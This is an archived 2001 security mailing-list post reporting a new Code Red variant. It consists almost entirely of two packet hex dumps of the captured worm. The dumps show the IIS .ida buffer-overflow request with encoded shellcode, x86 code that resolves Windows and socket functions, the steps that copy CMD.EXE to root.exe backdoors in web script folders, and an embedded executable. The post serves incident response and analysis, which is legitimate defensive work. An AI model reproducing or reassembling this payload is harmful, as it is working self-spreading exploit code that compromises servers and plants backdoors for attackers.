[prev in list] [next in list] [prev in thread] [next in thread]
List: incidents
Subject: New variant of Code Red?
From: Sven Carstens <s.carstens () gmx ! de>
Date: 2001-08-04 16:10:31
[Download RAW message or body]
Hi folks,
since 2001-08-04 13:13:07 GMT +0200 the usual CodeScans
are every now and then interrupted by a modified version.
The first thing to notice is that the fillup chars are changed from
N to X. Overflow code seems to be the same but the rest of the
packet has changed.
The snort alerts show first the usual ida attempt and then directly
following an alert for CMD.EXE.
First packet dump (ida alert):
length = 1460
000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida
010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX
020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co
1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33
1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`....
1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&..
1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\...
1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@
1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=...
200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=...........
210 : C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0...
220 : 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0......
230 : 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24 ...CodeRedII...$
240 : FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P
250 : FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P
260 : 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p....
270 : 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U.
280 : FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,...
290 : 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,.............
2a0 : 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u.....
2b0 : 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U
2c0 : D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T....
2d0 : 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j
2e0 : 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E
2f0 : 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U.
300 : 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s...
310 : 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p..
320 : FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d..
330 : 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U.
340 : 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f..
350 : FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P
360 : FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3
370 : DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h..
380 : FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........
390 : 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d.
3a0 : FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`..
3b0 : FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f
3c0 : 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1..
3d0 : 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h....
3e0 : 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j.
3f0 : 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U..
400 : 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w.
410 : C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu....
420 : F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg..
430 : 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.&
440 : 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P
450 : 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..<
460 : 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u
470 : BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G
480 : 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu..
490 : 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........
4a0 : 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg...
4b0 : 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E..
4c0 : 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA
4d0 : 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C
4e0 : 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u..
4f0 : 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic
500 : 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E.
510 : E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U
520 : F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst
530 : 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID.
540 : FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge
550 : 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory
560 : 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E......
570 : 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U.
580 : 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi
590 : 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E
5a0 : D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA
5b0 : 74 6F 6D 41 tomA
Second alert (cmd.exe alert):
length = 1460
000 : 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
010 : 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
020 : F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
030 : 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
040 : 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
050 : E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
060 : FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy
070 : 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..
080 : 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
090 : 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
0a0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
0b0 : 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u
0c0 : BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct
0d0 : 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E
0e0 : A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u
0f0 : BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele
100 : 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E.....
110 : 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..
120 : 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U..
130 : 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna
140 : 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E.....
150 : 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname..
160 : 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA
170 : 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u.
180 : FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3
190 : 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E.....
1a0 : 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx..
1b0 : 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i...
1c0 : 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4....
1d0 : C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t.
1e0 : C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................
1f0 : E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................
200 : E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ......
210 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................
220 : FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y..
230 : 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X.......
240 : 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t..
250 : 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
260 : BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
270 : 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
280 : 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr
290 : 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
2a0 : 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
2b0 : 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\
2c0 : 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
2d0 : 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
2e0 : 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U...
2f0 : 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
300 : FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
310 : 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
320 : 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%).........
330 : 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................
340 : 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ...
350 : 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@..............
360 : 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@...
370 : 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................
380 : 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ...............
390 : 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0...
3a0 : 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................
3c0 : 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`..
3e0 : 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... ....
3f0 : 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@.............
410 : 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............
420 : 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@.....
430 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
440 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
450 : FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h
470 : D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @..
480 : 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @..
490 : 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1
4a0 : 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j
4b0 : 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2...
4c0 : 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h
4d0 : 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@.......
4e0 : 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h
4f0 : 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h....
500 : E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L
510 : 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h
520 : B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5.
530 : 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j
540 : 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@...
550 : 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........
560 : 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h.
570 : 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@
580 : 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@..
590 : C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff.
5a0 : 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....
5b0 : 40 00 89 35 @..5
CU Sven
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic